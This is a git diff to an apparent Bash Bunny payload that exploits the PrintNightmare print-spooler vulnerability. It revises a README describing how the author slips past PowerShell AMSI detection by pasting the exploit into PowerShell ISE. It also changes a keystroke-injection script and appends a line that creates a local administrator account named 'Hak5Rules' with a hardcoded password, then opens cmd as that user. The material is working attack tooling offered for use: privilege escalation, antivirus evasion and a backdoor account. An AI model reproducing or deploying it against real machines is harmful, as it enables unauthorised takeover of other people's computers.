diff --git a/payloads/library/execution/PrintNightmare/README.md b/payloads/library/execution/PrintNightmare/README.md index 0c3814e3..6c1277ca 100644 --- a/payloads/library/execution/PrintNightmare/README.md +++ b/payloads/library/execution/PrintNightmare/README.md @@ -1,18 +1,25 @@ Title: PrintNightmare -Author: PanicACid -Version: 1.1 -Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator +Author: PanicAcid -As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! +Version: 1.2 + + +Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account, without bypassing defender or exectuon policy. It aint prudy but it works. + +Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally, even bypassing execution policy seemed to work but the output would always contain "This script contains malicious content and has been blocked by your antivirus software." + +However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!) Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense. +NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts content. # Purple.............Loading # Green .............Execute # Off................Finished + Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard. -Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin. +Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin. If you want to change the details it uses to create your user it's the last line of juicybits.txt diff --git a/payloads/library/execution/PrintNightmare/juicybit.txt b/payloads/library/execution/PrintNightmare/juicybit.txt index bcfef726..4435487a 100644 --- a/payloads/library/execution/PrintNightmare/juicybit.txt +++ b/payloads/library/execution/PrintNightmare/juicybit.txt @@ -520,4 +520,8 @@ function struct $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder) $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret) $StructBuilder.CreateType() -} \ No newline at end of file +} + +Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules' + +exit \ No newline at end of file diff --git a/payloads/library/execution/PrintNightmare/payload.txt b/payloads/library/execution/PrintNightmare/payload.txt index 614187e4..f380f7de 100644 --- a/payloads/library/execution/PrintNightmare/payload.txt +++ b/payloads/library/execution/PrintNightmare/payload.txt @@ -1,12 +1,22 @@ -# Title: Quick and Dirty PrintNightmare -# Author: PanicACid -# Version: 1.1 +#Title: PrintNightmare +#Author: PanicAcid +#Version: 1.2 # -# Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator -# As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole -# thing! -# Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and -# Foxtrot for putting up with my nonsense. +#Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account +#without bypassing defender or exectuon policy. It aint prudy but it works. +# +#Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally, +#even bypassing execution policy seemed to work but the output would always contain +#"This script contains malicious content and has been blocked by your antivirus software." +# +#However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!) +# +#Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. +#Additionally thanks to Korben and Foxtrot for putting up with my nonsense. +# +# NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused +# some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts +# content. # # Purple.............Loading # Green .............Execute @@ -37,7 +47,7 @@ QUACK ENTER QUACK DELAY 100 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))" QUACK ENTER -QUACK DELAY 500 +QUACK DELAY 200 QUACK STRING exit QUACK ENTER QUACK DELAY 500 @@ -50,18 +60,14 @@ QUACK CONTROL d QUACK CONTROL v QUACK CONTROL d QUACK ENTER -QUACK DELAY 2000 -QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'" -QUACK ENTER -QUACK DELAY 4000 -QUACK ALT F4 +QUACK DELAY 3000 QUACK GUI r QUACK DELAY 500 QUACK STRING cmd QUACK DELAY 150 QUACK ENTER QUACK DELAY 150 -QUACK STRING "runas /user:Hak5Rules cmd.exe && exit" +QUACK STRING "runas /noprofile /user:Hak5Rules cmd.exe && exit" QUACK ENTER QUACK DELAY 150 QUACK STRING Hak5Rules @@ -70,4 +76,4 @@ QUACK ENTER #----------------------------------- # Kill the lights - finished -LED FINISH +LED FINISH \ No newline at end of file